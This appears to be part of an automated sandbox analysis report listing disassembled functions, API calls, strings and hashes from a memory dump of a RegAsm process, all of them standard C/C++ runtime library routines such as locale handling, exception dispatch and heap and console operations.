Instruction Fuzzy Hash: AFF0C836A10115ABC724AF35EC46FFA37E8EB88314F51057EFA02D7281DA7CAD458758

Function 0041E78A Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

EnumSystemLocalesW.KERNEL32(0041EA68,00000001,45F1B473,?,-00000050,?,0041EE0A,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 0041E7D4

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 02464ed723b4c354a84e3378b332530d88ad943763cb876e16d480aee733ffc6
Instruction ID: 6c1b8be79df370ff527d3fdf83c27c448d8a6d1d4b53373dd59006919712f969
Opcode Fuzzy Hash: 02464ed723b4c354a84e3378b332530d88ad943763cb876e16d480aee733ffc6
Instruction Fuzzy Hash: 4AF0FC3A3003045FEB145F36DC816BABB95FF81758F15442EFD0647680D6755C82D714

Function 00414128 Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0040E0B6: EnterCriticalSection.KERNEL32(?,?,00412ECC,00000000,00432B68,0000000C,00412E93,0000000C,?,004140B7,0000000C,?,004152C9,00000001,00000364,?), ref: 0040E0C5

EnumSystemLocalesW.KERNEL32(0041411B,00000001,00432BE8,0000000C,0041454A,00000000), ref: 00414160

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: fc11d79f479730948cfa985309707b8b0dda7b619e314f4f66de2ebc116367d5
Instruction ID: bc8c9cdb39ea7b6907bdcd078d42f788ce3f3be240e1371db2048b296ab99c2e
Opcode Fuzzy Hash: fc11d79f479730948cfa985309707b8b0dda7b619e314f4f66de2ebc116367d5
Instruction Fuzzy Hash: FBF04F72A04204DFD710EF99E842B9C77B0FB84724F10412BF411EB2E1CBB959409B58

Function 0041E6A4 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041512B: GetLastError.KERNEL32(?,00000008,004176AA), ref: 0041512F
Part of subcall function 0041512B: SetLastError.KERNEL32(00000000,00000001,00000006,000000FF), ref: 004151D1

EnumSystemLocalesW.KERNEL32(0041E5FD,00000001,45F1B473,?,?,0041EE68,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0041E6DB

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: a2ffc06d5736e119ec660f653c38e39955ecf1050f89d0cc871d51e530c5514b
Instruction ID: f4de27644733dcfc8870d4860b87f459398b730b02dc09fbb697d88a70ba3928
Opcode Fuzzy Hash: a2ffc06d5736e119ec660f653c38e39955ecf1050f89d0cc871d51e530c5514b
Instruction Fuzzy Hash: 2FF0EC3930024597CB149F36D8457AABF55EFC1714B97405AEE068B290C6759883C754

Function 0041464E Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00412A37,?,20001004,00000000,00000002,?,?,00412039), ref: 00414682

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction ID: c8c0b9562f9231183dee5b7a6e52053c98a93abb6350c4165c74df5b9bb5bc08
Opcode Fuzzy Hash: a79f5b4871ba1c4f54388a69458767bdf475af3fdf68469de367ee09879fad86
Instruction Fuzzy Hash: D9E04831540118B7CF122F61DC04EEE7F15FF95751F064116FC0566161C7399961A69D

Function 00407C53 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00007C5F,0040727A), ref: 00407C58

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 79dec9a97241ece6b8b7572846782a00b5d64aae3784071d2de835e605e51f4e
Instruction ID: 3c64f4b928e2e8a9299ff9da9a038668c79c2f648c86c238da55c8401a5bab25
Opcode Fuzzy Hash: 79dec9a97241ece6b8b7572846782a00b5d64aae3784071d2de835e605e51f4e
Instruction Fuzzy Hash:

Function 0041EFC8 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0041EFC8

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction ID: d5d072ba9748c195f736b78e16f2f5f2af1f06de213b616d404cea10f9c51eb0
Opcode Fuzzy Hash: 960917853a08cbcbaec74a3857df259023f2eba71cc87e2cdee0c8228e0b7f47
Instruction Fuzzy Hash: 01A02230300280CF83808F32AE0CB0C3FF8AE082E0B0AC03AA000C80B0EF3080A0AF08

Function 00404B10 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00404B3C
std::_Lockit::_Lockit.LIBCPMT ref: 00404B59
std::_Lockit::~_Lockit.LIBCPMT ref: 00404B7D
std::_Lockit::~_Lockit.LIBCPMT ref: 00404BA8
std::_Lockit::_Lockit.LIBCPMT ref: 00404C1A
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00404C6F
__Getctype.LIBCPMT ref: 00404C86
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00404CC6
std::_Lockit::~_Lockit.LIBCPMT ref: 00404D68
std::_Facet_Register.LIBCPMT ref: 00404D6E

Strings

bad locale name, xrefs: 00404D88

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Locinfo::_$Facet_GetctypeLocinfo_ctorLocinfo_dtorRegister
String ID: bad locale name
API String ID: 103145292-1405518554
Opcode ID: 16ee915ab7cf0eeebb519dba0dd6371d05be51749d4f9f448169caa51adc919d
Instruction ID: 6e9f63e8d2ea1b6a4942e0921d9002d8c0fd89e6bfff9ad2541224c8a884b4bc
Opcode Fuzzy Hash: 16ee915ab7cf0eeebb519dba0dd6371d05be51749d4f9f448169caa51adc919d
Instruction Fuzzy Hash: D56191B19047408BE710DF65D981B5BB7E4AFD4304F05483EF989A7392E738E948CB5A

Function 0040A988 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0040AAA7
___TypeMatch.LIBVCRUNTIME ref: 0040ABB5
_UnwindNestedFrames.LIBCMT ref: 0040AD07
CallUnexpected.LIBVCRUNTIME ref: 0040AD22

Strings

hqB, xrefs: 0040AA9E
csm, xrefs: 0040AA32
csm, xrefs: 0040AADE
csm, xrefs: 0040A9C5

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm$hqB
API String ID: 2751267872-961717235
Opcode ID: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
Instruction ID: 60820d6e0ecca0eb9fd5676567882ca170ad0f0461b4efe27468591c46910b05
Opcode Fuzzy Hash: 5312b3d91eab99b169114e3402d6476c4e494fcb55b904c8292e4fd39c2bab0a
Instruction Fuzzy Hash: D1B177719003099FDF24DFA5C9809AFB7B5FF14304B15456AE8017B282D339EA61CF9A

Function 00422D30 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 147COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,0042484F), ref: 00422D49

Strings

pow, xrefs: 00422DE7, 00422E91, 00422EDE
exp, xrefs: 00422DC8, 00422E2D
log10, xrefs: 00422D8B, 00422D9A
log, xrefs: 00422DA6, 00422DB5
sqrt, xrefs: 00422E88
acos, xrefs: 00422E7F
asin, xrefs: 00422E76

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 7b307bdfa77ac4e727fad644a701e6850a4604595a9cd81a6cd06f0e8c4ceaf9
Instruction ID: c72ee430fc5992e789082aa674a62eb4bc159944c4a08777ca012a565c4a57b4
Opcode Fuzzy Hash: 7b307bdfa77ac4e727fad644a701e6850a4604595a9cd81a6cd06f0e8c4ceaf9
Instruction Fuzzy Hash: C2515F71B0062AEBCF108F59FA481AE7BB0FB05304FD24157D891A7264CBBD8925DB5E

Function 0040717D Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00407183
GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 00407191
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 004071A2
GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 004071B3

Strings

GetCurrentPackageId, xrefs: 0040718B
GetTempPath2W, xrefs: 004071A8
GetSystemTimePreciseAsFileTime, xrefs: 00407197
kernel32.dll, xrefs: 0040717E

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
API String ID: 667068680-1247241052
Opcode ID: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction ID: 3afd18a413fbafaec0d1884410ec314f69904bb85606d66d63126fe90f125993
Opcode Fuzzy Hash: 12cc8ab004fe47f31fffcbf58e36badd15f6e56e2ad587471c9b10d870eb8305
Instruction Fuzzy Hash: 3CE0EC71749671AB83209F70BC0EDAA3AA4EE0971139205B2BD15D2361D6BC44559B9C

Function 00424315 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(016BCC30,016BCC30,?,7FFFFFFF,?,004245E5,016BCC30,016BCC30,?,016BCC30,?,?,?,?,016BCC30,?), ref: 004243BB
__alloca_probe_16.LIBCMT ref: 00424476
__alloca_probe_16.LIBCMT ref: 00424505
__freea.LIBCMT ref: 00424550
__freea.LIBCMT ref: 00424556
__freea.LIBCMT ref: 0042458C
__freea.LIBCMT ref: 00424592
__freea.LIBCMT ref: 004245A2

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: faf4b7bb4f82d6e060df7418f04cdf54d9d5ced2acf79a653a27d1271983cb36
Instruction ID: 2268128186bf180321159b17a5804e3cf269d1f4a161c5de96289f76b50a9a64
Opcode Fuzzy Hash: faf4b7bb4f82d6e060df7418f04cdf54d9d5ced2acf79a653a27d1271983cb36
Instruction Fuzzy Hash: 55711872B00225ABDF20AF94AC41BAF77A5DFC9714FA4001BEA54A7381D73CDC818769

Function 004142F1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,FD7B20F3,?,004143FE,004038D3,?,?,00000000), ref: 004143B2

Strings

api-ms-, xrefs: 00414348
ext-ms-, xrefs: 0041435C

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction ID: 29acd09180d048b520d34109221675969bd24e1d04ac4f63b004638bf800aa58
Opcode Fuzzy Hash: 86759f0994eafd6f84a6647c0fdf9b4e30a2247b6dec6dce197b99e7f52573c2
Instruction Fuzzy Hash: 9A210572B01218EBCB219B61EC45FDB3758AF81765F250222ED26A7380D738ED41C6D8

Function 00422220 Relevance: 9.3, APIs: 6, Instructions: 298COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 210f578ede6e8c57bcd3a2866613218aeec721f6e00fb4164bfe4fb791038aae
Instruction ID: 0fa8f66f13a9205f03f3c964acb7b0f3d35d0cf0561fe90a84cb6ac065f7fb8a
Opcode Fuzzy Hash: 210f578ede6e8c57bcd3a2866613218aeec721f6e00fb4164bfe4fb791038aae
Instruction Fuzzy Hash: 2FB1FA70B00265BFDB11DF59D980BAE7BB1BF85304F54815AE400AB392C7F99D42CB69

Function 0040A61A Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040A611,00408D4A,00407CA3), ref: 0040A628
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040A636
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040A64F
SetLastError.KERNEL32(00000000,0040A611,00408D4A,00407CA3), ref: 0040A6A1

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
Instruction ID: 17c3b720e5989fb0f4645250ee9d2db9be2b1969e3f2a356d50bd165ba2ebccc
Opcode Fuzzy Hash: ea70f88f1a7dd67ad85e4a1eb3bc890aa5c44d2470a951be6c0d9591e2143091
Instruction Fuzzy Hash: 4C01D2322083111EE62836B5BC456672678DB21378734023FF114B22E1EF7F1C11558D

Function 004114B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,FD7B20F3,?,?,00000000,0042533E,000000FF,?,00411448,?,?,0041141C,00000016), ref: 004114ED
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004114FF
FreeLibrary.KERNEL32(00000000,?,00000000,0042533E,000000FF,?,00411448,?,?,0041141C,00000016), ref: 00411521

Strings

CorExitProcess, xrefs: 004114F7
mscoree.dll, xrefs: 004114E6

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: da08a1f12de9d9fa0ab2bf8521bb4e597b9d9615b2022019d023aedce6e96a45
Instruction ID: 1c3cb0f38f93fbefe2a6f9ddff53ce04e6b84d498977bd807167e5d34d417036
Opcode Fuzzy Hash: da08a1f12de9d9fa0ab2bf8521bb4e597b9d9615b2022019d023aedce6e96a45
Instruction Fuzzy Hash: 3801A231B40625FFDB218F50DC09BBEBBB9FB44B15F400526E912A22A0DB789D00CA98

Function 00418EA1 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00418F28
__alloca_probe_16.LIBCMT ref: 00418FE9
__freea.LIBCMT ref: 00419050

Part of subcall function 00415416: HeapAlloc.KERNEL32(00000000,?,?,?,0040743B,?,?,004038D3,0000000C), ref: 00415448

__freea.LIBCMT ref: 00419065
__freea.LIBCMT ref: 00419075

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: e87fd6e571ad0e28fa7a801ff3008c7610ce0f637704132bd005f8cf4c9e9da1
Instruction ID: 70ac7dc22d859429bcfaf21a5452dbaba508fd75fda8d3d1cad1bcbaee3c79d9
Opcode Fuzzy Hash: e87fd6e571ad0e28fa7a801ff3008c7610ce0f637704132bd005f8cf4c9e9da1
Instruction Fuzzy Hash: CE51C872600216AFEB249F65CC41EFB3AAAEF48754B15012EFD08D7250EB39DC918769

Function 00405A19 Relevance: 7.5, APIs: 5, Instructions: 49COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00405A20
std::_Lockit::_Lockit.LIBCPMT ref: 00405A2A

Part of subcall function 00401980: std::_Lockit::_Lockit.LIBCPMT ref: 0040199C
Part of subcall function 00401980: std::_Lockit::~_Lockit.LIBCPMT ref: 004019B9

codecvt.LIBCPMT ref: 00405A64
std::_Facet_Register.LIBCPMT ref: 00405A7B
std::_Lockit::~_Lockit.LIBCPMT ref: 00405A9B

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
String ID:
API String ID: 712880209-0
Opcode ID: 7fb8576a75b95fb445e58ecf22290f584e2f77657a518a4edd59b5f9bfd13557
Instruction ID: aa6d00897e01abd1bad4c0c36b67e0d55590054934450fdc9fe3478e464ff2ad
Opcode Fuzzy Hash: 7fb8576a75b95fb445e58ecf22290f584e2f77657a518a4edd59b5f9bfd13557
Instruction Fuzzy Hash: A001AD71A00A16CBCB05EB658881AAF7761EF84324F24052EF411BB3D2CF3C9E058F89

Function 00401F00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00401F9D

Part of subcall function 00408080: RaiseException.KERNEL32(E06D7363,00000001,00000003,00407F9B,?,?,?,?,00407F9B,0000000C,00432FA4,0000000C), ref: 004080E0

Strings

ios_base::eofbit set, xrefs: 00401F46
ios_base::failbit set, xrefs: 00401E62, 00401F41
ios_base::badbit set, xrefs: 00401F37, 00401F62, 00401F80

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionRaise___std_exception_copy
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3109751735-1866435925
Opcode ID: 6416560fe7b3465a17b1f8f352e1428cd4f36e73f34119d908d19ba395871ba5
Instruction ID: d02687490f24597757631495c4e1f09aa39ba096523de16938e047820cfe1a48
Opcode Fuzzy Hash: 6416560fe7b3465a17b1f8f352e1428cd4f36e73f34119d908d19ba395871ba5
Instruction Fuzzy Hash: 7B1124B2910715ABC710DF58D801B96B3E8AF08310F14853FF954E7291F778A844CBA9

Function 0040B762 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000011,00000000,00000800,?,0040B713,00000000,00000001,0043568C,?,?,?,0040B8B6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx), ref: 0040B76F
GetLastError.KERNEL32(?,0040B713,00000000,00000001,0043568C,?,?,?,0040B8B6,00000004,InitializeCriticalSectionEx,00427C38,InitializeCriticalSectionEx,00000000,?,0040B66D), ref: 0040B779
LoadLibraryExW.KERNEL32(00000011,00000000,00000000,?,00000011,0040A583), ref: 0040B7A1

Strings

api-ms-, xrefs: 0040B786

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction ID: 6663bac76f2ed2691183a1b60790d81093b85d379b5950931f3594d96b826320
Opcode Fuzzy Hash: 22226141dfb546a2f16a4bc61347b62053759e468ff986d8c484c8ccf3c75455
Instruction Fuzzy Hash: 95E01A34384208BFEF605B61EC06F5A3E64AB80B85FA04031FA0DE91E1E779A96195CC

Function 004164B2 Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(FD7B20F3,00000000,00000000,0040BDA8), ref: 00416515

Part of subcall function 0041B07B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419046,?,00000000,-00000008), ref: 0041B127

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00416770
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004167B8
GetLastError.KERNEL32 ref: 0041685B

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 9c03409dc5e3a637d6edbebb8196099dd852bb166edf4384a40f4e99c6182c37
Instruction ID: 23b960d84f86169114bff6dd91ebd8bfb000f40d43b919249b886c4f1d777fdd
Opcode Fuzzy Hash: 9c03409dc5e3a637d6edbebb8196099dd852bb166edf4384a40f4e99c6182c37
Instruction Fuzzy Hash: 57D17975E002589FCB11DFA8D880AEDBBB5FF48304F19452AE866E7341D734E882CB54

Function 0040A731 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 0040A7F8
___AdjustPointer.LIBCMT ref: 0040A81B
___AdjustPointer.LIBCMT ref: 0040A8B7

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction ID: 563ab20b51bfab9fbe5384d5980a8cd95d5d08f0ac2ebead566dcb8f0746e7f3
Opcode Fuzzy Hash: 651f461737145a99faeddf7e9cbc434de1019a0abfbd738a44b85bf0bb0bacfa
Instruction Fuzzy Hash: 8E51CF72A003069FEB29AF11C941B7A77B4EF04314F14853FE8056B2D1E739E862C79A

Function 0041B497 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 0041B07B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419046,?,00000000,-00000008), ref: 0041B127

GetLastError.KERNEL32 ref: 0041B4FB
__dosmaperr.LIBCMT ref: 0041B502
GetLastError.KERNEL32(?,?,?,?), ref: 0041B53C
__dosmaperr.LIBCMT ref: 0041B543

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction ID: e5a019830a3c5c962b54c78c2afe39edf9115806d1ecbdc6188aeecc851efa14
Opcode Fuzzy Hash: 98539fc020fd00bd43affe0888965e6ed426553bce3dc314c44ab490fe6ade4c
Instruction Fuzzy Hash: 3E21B371600615BFDB20AF6688809ABB7A9FF04368710C52FF91997251D778EC9087E8

Function 00410892 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction ID: 3ec36e4c3c4c4b3940ca693e254ce5ca1d14e98f6d28ba957a4fd44e2fb4f4c4
Opcode Fuzzy Hash: 66e116e2024aada6cab71803717b56169a7abbe351efb3759331a0be8796517d
Instruction Fuzzy Hash: E621D7B1210205AFEB20AF62CC609AB7768BF40368710452BF959D7252D7B8ECD087A8

Function 0041C42D Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0041C435

Part of subcall function 0041B07B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00419046,?,00000000,-00000008), ref: 0041B127

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C46D
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041C48D

Memory Dump Source

Source File: 00000019.00000002.1926189866.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction ID: 0fd12c7dda382d3999d10f706f970f90d8e04c4becb4264e138dc4c2bd032ff0
Opcode Fuzzy Hash: 4d096bac32b07df6f96bbfc29f435c2dddc1c3056e5e13fb52e26ce166ed4541
Instruction Fuzzy Hash: 4F11C4B6605515BFA72127B25CDACFF6D5CDE89398710402BF901D2102EA3CDD8295BD

Function 004241D9 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00421C32,00000000,00000001,00000000,0040BDA8,?,004168AF,0040BDA8,00000000,00000000), ref: 004241F0
